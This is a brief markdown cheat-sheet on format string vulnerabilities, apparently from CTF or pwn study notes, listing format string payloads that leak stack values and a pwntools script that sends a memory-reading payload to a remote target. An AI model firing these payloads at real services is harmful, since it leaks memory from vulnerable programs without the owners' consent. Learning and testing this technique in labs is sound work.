# Format String

* Read and write values from stack

## Read

* Input `%x` for every value that should be read from the stack
```sh
%x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x 
```
* Select values as string, e.g. the second value
```sh
%2$s
```
* Another way of reading is via `%p`

* [ir0stone's pwn-notes](https://github.com/ir0nstone/pwn-notes/blob/master/types/stack/format-string.md) contains some useful pwntool scripts like this one
```python
from pwn import *

#p = process('./vuln')
p = remote(target_ip, 9006)

payload = b'%14$p||||'                                                                                                         
payload += p32(0x8048000)

p.sendline(payload)
log.info(p.clean())
```